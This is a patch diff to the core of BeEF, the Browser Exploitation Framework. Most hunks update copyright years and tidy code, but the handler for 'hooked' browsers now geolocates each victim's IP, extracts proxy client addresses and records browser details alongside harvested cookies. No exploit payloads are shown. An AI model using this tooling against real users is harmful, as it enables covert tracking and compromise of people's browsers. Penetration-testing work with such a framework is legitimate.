-   	FRIENDLY_UN_NAME  = "UNKNOWN"
- 
-    # Attempt to retrieve a browsers friendly name
+    FRIENDLY_UN_NAME  = 'UNKNOWN'
+
+    # Attempt to retrieve a browser's friendly name
     # @param [String] browser_name Short browser name
     # @return [String] Friendly browser name
-   	def self.friendly_name(browser_name)
-	  
-   	  case browser_name
-   	    when FF;       return FRIENDLY_FF_NAME 
-   	    when M;        return FRIENDLY_M_NAME 	   
-   	    when IE;       return FRIENDLY_IE_NAME   	   
-   	    when S;        return FRIENDLY_S_NAME  	   
-   	    when K;        return FRIENDLY_K_NAME  	   
-        when C;        return FRIENDLY_C_NAME
-        when O;        return FRIENDLY_O_NAME
+    def self.friendly_name(browser_name)
+
+      case browser_name
+        when FF;       return FRIENDLY_FF_NAME
+        when M ;       return FRIENDLY_M_NAME
+        when IE;       return FRIENDLY_IE_NAME
+        when S ;       return FRIENDLY_S_NAME
+        when K ;       return FRIENDLY_K_NAME
+        when C ;       return FRIENDLY_C_NAME
+        when O ;       return FRIENDLY_O_NAME
         when UNKNOWN;  return FRIENDLY_UN_NAME
-   	  end
-	    
-  	end
+      end
+
+    end
 
     # Attempt to match the browserstring to a browser constant
     # @param [String] browserstring Browser UA string
     # @return [Array] An array of matching browser constants
     # @todo Confirm this function returns an array if multiple constants are matched
-  	def self.match_browser(browserstring)
-  		matches = []
-			browserstring.split(" ").each do |chunk|
-			  case chunk
-			    when /Firefox/ , /FF/
-				    matches << FF
-			    when /Mozilla/
-				    matches << M
-				  when /Internet Explorer/, /IE/
-					  matches << IE
-				  when /Safari/
-			      matches << S
-				  when /Konqueror/
-				    matches << K
-				  when /Chrome/
-				    matches << C
-         when /Opera/
-				    matches << O
-				end
-			end
-			matches.uniq
-	  end
+    def self.match_browser(browserstring)
+      matches = []
+      browserstring.split(" ").each do |chunk|
+        case chunk
+        when /Firefox/, /FF/
+          matches << FF
+        when /Mozilla/
+          matches << M
+        when /Internet Explorer/, /IE/
+          matches << IE
+        when /Safari/
+          matches << S
+        when /Konqueror/
+          matches << K
+        when /Chrome/
+          matches << C
+        when /Opera/
+          matches << O
+        end
+      end
+      matches.uniq
+    end
 
   end
-  
+
 end
 end
 end

core/main/constants/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/distributedengine.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/hardware.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -34,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

core/main/constants/os.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/crypto.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/distributed_engine/models/rules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #print_debug "[INIT] HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,86 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # geolocation
+          if config.get('beef.geoip.enable')
+            require 'geoip'
+            geoip_file = config.get('beef.geoip.database')
+            if File.exists? geoip_file
+              geoip = GeoIP.new(geoip_file).city(zombie.ip)
+              if geoip.nil?
+                print_debug "[INIT] Geolocation failed - No results for IP address '#{zombie.ip}'"
+              else
+                #print_debug "[INIT] Geolocation results: #{geoip}"
+                BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} is connecting from: #{geoip}", "#{zombie.id}")
+                BD.set(session_id, 'LocationCity',          "#{geoip['city_name']}")
+                BD.set(session_id, 'LocationCountry',       "#{geoip['country_name']}")
+                BD.set(session_id, 'LocationCountryCode2',  "#{geoip['country_code2']}")
+                BD.set(session_id, 'LocationCountryCode3',  "#{geoip['country_code3']}")
+                BD.set(session_id, 'LocationContinentCode', "#{geoip['continent_code']}")
+                BD.set(session_id, 'LocationPostCode',      "#{geoip['postal_code']}")
+                BD.set(session_id, 'LocationLatitude',      "#{geoip['latitude']}")
+                BD.set(session_id, 'LocationLongitude',     "#{geoip['longitude']}")
+                BD.set(session_id, 'LocationDMACode',       "#{geoip['dma_code']}")
+                BD.set(session_id, 'LocationAreaCode',      "#{geoip['area_code']}")
+                BD.set(session_id, 'LocationTimezone',      "#{geoip['timezone']}")
+                BD.set(session_id, 'LocationRegionName',    "#{geoip['real_region_name']}")
+              end
+            else
+              print_error "[INIT] Geolocation failed - Could not find MaxMind GeoIP database '#{geoip_file}'"
+              print_more  "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"
+            end
+          end
+
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.empty?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
           # get and store browser version
           browser_version = get_param(@data['results'], 'BrowserVersion')
           if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -95,6 +176,10 @@ module BeEF
             self.err_msg "Invalid browser string returned from the hook browser's initial connection."
           end
 
+          # get and store browser language
+          browser_lang = get_param(@data['results'], 'BrowserLanguage')
+          BD.set(session_id, 'BrowserLanguage', browser_lang)
+
           # get and store the cookies
           cookies = get_param(@data['results'], 'Cookies')
           if BeEF::Filters.is_valid_cookies?(cookies)
@@ -111,6 +196,10 @@ module BeEF
             self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
           end
 
+          # get and store default browser
+          default_browser = get_param(@data['results'], 'DefaultBrowser')
+          BD.set(session_id, 'DefaultBrowser', default_browser)
+
           # get and store the hardware name
           hw_name = get_param(@data['results'], 'Hardware')
           if BeEF::Filters.is_valid_hwname?(hw_name)
@@ -199,113 +288,25 @@ module BeEF
             self.err_msg "Invalid window size returned from the hook browser's initial connection."
           end
 
-          # get and store the yes|no value for JavaEnabled
-          java_enabled = get_param(@data['results'], 'JavaEnabled')
-          if BeEF::Filters.is_valid_yes_no?(java_enabled)
-            BD.set(session_id, 'JavaEnabled', java_enabled)
-          else
-            self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for VBScriptEnabled
-          vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
-          if  BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
-            BD.set(session_id, 'VBScriptEnabled', vbscript_enabled)
-          else
-            self.err_msg "Invalid value for VBScriptEnabled returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasFlash
-          has_flash = get_param(@data['results'], 'HasFlash')
-          if BeEF::Filters.is_valid_yes_no?(has_flash)
-            BD.set(session_id, 'HasFlash', has_flash)
-          else
-            self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasPhonegap
-          has_phonegap = get_param(@data['results'], 'HasPhonegap')
-          if BeEF::Filters.is_valid_yes_no?(has_phonegap)
-            BD.set(session_id, 'HasPhonegap', has_phonegap)
-          else
-            self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasGoogleGears
-          has_googlegears = get_param(@data['results'], 'HasGoogleGears')
-          if BeEF::Filters.is_valid_yes_no?(has_googlegears)
-            BD.set(session_id, 'HasGoogleGears', has_googlegears)
-          else
-            self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasFoxit
-          has_foxit = get_param(@data['results'], 'HasFoxit')
-          if BeEF::Filters.is_valid_yes_no?(has_foxit)
-            BD.set(session_id, 'HasFoxit', has_foxit)
-          else
-            self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasWebSocket
-          has_web_socket = get_param(@data['results'], 'HasWebSocket')
-          if BeEF::Filters.is_valid_yes_no?(has_web_socket)
-            BD.set(session_id, 'HasWebSocket', has_web_socket)
-          else
-            self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasActiveX
-          has_activex = get_param(@data['results'], 'HasActiveX')
-          if BeEF::Filters.is_valid_yes_no?(has_activex)
-            BD.set(session_id, 'HasActiveX', has_activex)
-          else
-            self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasSilverlight
-          has_silverlight = get_param(@data['results'], 'HasSilverlight')
-          if BeEF::Filters.is_valid_yes_no?(has_silverlight)
-            BD.set(session_id, 'HasSilverlight', has_silverlight)
-          else
-            self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasQuickTime
-          has_quicktime = get_param(@data['results'], 'HasQuickTime')
-          if BeEF::Filters.is_valid_yes_no?(has_quicktime)
-            BD.set(session_id, 'HasQuickTime', has_quicktime)
-          else
-            self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasRealPlayer
-          has_realplayer = get_param(@data['results'], 'HasRealPlayer')
-          if BeEF::Filters.is_valid_yes_no?(has_realplayer)
-            BD.set(session_id, 'HasRealPlayer', has_realplayer)
-          else
-            self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasWMP
-          has_wmp = get_param(@data['results'], 'HasWMP')
-          if BeEF::Filters.is_valid_yes_no?(has_wmp)
-            BD.set(session_id, 'HasWMP', has_wmp)
-          else
-            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
-          end
-
-          # get and store the yes|no value for HasVLC
-          has_vlc = get_param(@data['results'], 'HasVLC')
-          if BeEF::Filters.is_valid_yes_no?(has_vlc)
-            BD.set(session_id, 'HasVLC', has_vlc)
-          else
-            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
+          # get and store the yes|no value for browser components
+          components = [
+            'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
+            'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX',
+            'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP',
+            'hasSessionCookies', 'hasPersistentCookies'
+          ]
+          components.each do |k|
+            v = get_param(@data['results'], k)
+            if BeEF::Filters.is_valid_yes_no?(v)
+              BD.set(session_id, k, v)
+            else
+              self.err_msg "Invalid value for #{k} returned from the hook browser's initial connection."
+            end
           end
 
           # get and store the value for CPU
           cpu_type = get_param(@data['results'], 'CPU')
-          if !cpu_type.nil?
+          if BeEF::Filters.is_valid_cpu?(cpu_type)
             BD.set(session_id, 'CPU', cpu_type)
           else
             self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
@@ -319,22 +320,6 @@ module BeEF
             self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
           end
 
-          # get and store whether the browser has session cookies enabled
-          has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
-          if BeEF::Filters.is_valid_yes_no?(has_session_cookies)
-            BD.set(session_id, 'hasSessionCookies', has_session_cookies)
-          else
-            self.err_msg "Invalid value for hasSessionCookies returned from the hook browser's initial connection."
-          end
-
-          # get and store whether the browser has persistent cookies enabled
-          has_persistent_cookies = get_param(@data['results'], 'hasPersistentCookies')
-          if BeEF::Filters.is_valid_yes_no?(has_persistent_cookies)
-            BD.set(session_id, 'hasPersistentCookies', has_persistent_cookies)
-          else
-            self.err_msg "Invalid value for hasPersistentCookies returned from the hook browser's initial connection."
-          end
-
           # log a few info of newly hooked zombie in the console
           print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
 

core/main/handlers/commands.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/modules/beefjs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -21,7 +21,7 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
+            ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
             # @note BeEF libraries: need Eruby evaluation and obfuscation
             beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)

core/main/handlers/modules/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -29,6 +29,7 @@ module BeEF
               command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
             else
               key = BeEF::Module.get_key_by_database_id(command.command_module_id)
+              (print_error "Could not find command module with ID #{command.command_module_id}"; return) if key.nil?
               command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
             end
 
@@ -52,7 +53,7 @@ module BeEF
             if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
               #content = command_module.output.gsub('//
               #//
-              #//   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+              #//   Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
               #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
               #//   See the file 'doc/COPYING' for copying permission
               #//

core/main/logger.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -36,10 +36,9 @@ module Core
       raise Exception::TypeError, '"from" needs to be a string' if not from.string?
       raise Exception::TypeError, '"event" needs to be a string' if not event.string?
       raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
-      
       # logging the new event into the database
       @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
-
+      print_debug "Event: #{event}"
       # if notifications are enabled send the info there too
       if @notifications
         @notifications.new(from, event, time_now, hb)

core/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end

core/main/models/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/hookedbrowser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/log.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/optioncache.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/result.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/user.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/dynamicreconstruction.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/raw.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/redirector.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/websocket/websocket.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -94,7 +94,7 @@ module BeEF
           #              execute(msg_hash)
           #            end
           #          }
-          #        rescue Exception => e
+          #        rescue => e
           #          print_error "WebSocket-secured error: #{e}"
           #        end
           #      end
@@ -150,7 +150,7 @@ module BeEF
           #            execute(msg_hash)
           #          end
           #        }
-          #      rescue Exception => e
+          #      rescue => e
           #        print_error "WebSocket error: #{e}"
           #      end
           #    end
@@ -203,7 +203,7 @@ module BeEF
                       execute(msg_hash)
                     end
                   }
-                rescue Exception => e
+                rescue => e
                   print_error "WebSocket error: #{e}"
                 end
               end

core/main/rest/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -37,12 +37,19 @@ module BeEF
         end
       end
 
+      module RegisterServerHandler
+        def self.mount_handler(server)
+          server.mount('/api/server', BeEF::Core::Rest::Server.new)
+        end
+      end
+
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
 
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
       BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
 
       #
       # Check the source IP is within the permitted subnet

core/main/rest/handlers/admin.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -52,7 +52,7 @@ module BeEF
                 "token" => "#{config.get('beef.api_token')}"
               }.to_json
             end
-          rescue Exception => e
+          rescue => e
             error 400
           end
         end

core/main/rest/handlers/categories.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/logs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -149,7 +149,7 @@ module BeEF
             data.each{|k,v| options.push({'name' => k, 'value' => v})}
             exec_results = BeEF::Module.execute(modk, params[:session], options)
             exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
-          rescue Exception => e
+          rescue => e
             print_error "Invalid JSON input for module '#{params[:mod_id]}'"
             error 400 # Bad Request
           end
@@ -203,7 +203,7 @@ module BeEF
               end
             end
             results.to_json
-          rescue Exception => e
+          rescue => e
             print_error "Invalid JSON input passed to endpoint /api/modules/multi"
             error 400 # Bad Request
           end
@@ -265,7 +265,7 @@ module BeEF
               }
             end
             results.to_json
-          rescue Exception => e
+          rescue => e
             print_error "Invalid JSON input passed to endpoint /api/modules/multi"
             error 400 # Bad Request
           end

core/main/rest/handlers/server.rb

@@ -0,0 +1,41 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
